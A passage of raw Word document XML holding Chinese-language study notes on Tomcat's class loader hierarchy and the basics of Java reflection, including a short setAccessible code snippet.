                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动的时候，会初始化图示所示的类加载器。而上面的三个类加载器：</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CommonClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CatalinaClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SharedClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是与具体部署的</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用无关的，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WebappClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用，每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00221F39">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用都会有独立的类加载器，从而实现类的隔离。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221F39" w:rsidRPr="00221F39" w:rsidRDefault="00EC0BE7" w:rsidP="00221F39">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以上就是</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用中类加载的机制。在</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00BD4852">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认情况下</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00BD4852">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WebappClassLoader</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00BD4852">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的父类加载器就是</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00BD4852">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CommonClassLoader</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但是我们可以通过修改</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>catalina.properties</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件来设置</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SharedClassLoader</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，从而实现多个</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00221F39" w:rsidRPr="00EC0BE7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用共用类库的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221F39" w:rsidRPr="00221F39" w:rsidRDefault="00221F39" w:rsidP="00884D5D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0084413B" w:rsidRPr="0084413B" w:rsidRDefault="00CD1E4B" w:rsidP="00CD1E4B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1E4B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/xing901022/p/4574961.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB2BA1" w:rsidRPr="00C26429" w:rsidRDefault="00BB2BA1" w:rsidP="00BB2BA1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类加载机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354335" w:rsidRPr="00BB2BA1" w:rsidRDefault="00354335" w:rsidP="006B0CAF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E0CA5" w:rsidRPr="00F41A4C" w:rsidRDefault="00F512D8" w:rsidP="009E0CA5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.9</w:t>
      </w:r>
      <w:r w:rsidR="009E0CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009E0CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>反射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00644769" w:rsidRDefault="00644769" w:rsidP="00644769">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>反射机制是在</w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="136EC2"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>运行状态</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，对于任意一个类，都能够知道这个类的所有属性和方法；对于任意一个对象，都能够调用它的任意一个方法和属性；这种动态获取的信息以及动态调用对象的方法的功能称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语言的反射机制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB4646" w:rsidRDefault="00350E9F" w:rsidP="00644769">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>反射包括了一些动态类型，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>无法</w:t>
      </w:r>
      <w:r w:rsidR="00BB4646">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>对这些代码进行优化。因此，反射操作的效率要比那些非反射操作低得多</w:t>
      </w:r>
      <w:r w:rsidR="00BB4646">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C263F" w:rsidRDefault="006C263F" w:rsidP="00203253">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>由于反射允许代码执行一些在正常情况下不被允许的操作（比如访问私有的属性和方法），所以使用反射可能会导致意料之外的副作用－－代码有功能上的错误，降低可移植性。反射代码破坏了抽象性，因此当平台发生改变的时候，代码的行为就有可能也随着变化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086600F" w:rsidRDefault="0086600F" w:rsidP="00203253">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>效率</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086600F" w:rsidRDefault="0086600F" w:rsidP="00203253">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>访问私有属性和方法副作用，可移植性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463E76" w:rsidRDefault="00463E76" w:rsidP="00203253">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>质量把控</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3739" w:rsidRDefault="000A56FE" w:rsidP="00203253">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Method method = getMethod(obj.getClass(), methodName, classes);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3739" w:rsidRDefault="00CB3739" w:rsidP="00203253">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>method.setAccessible(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment"/>
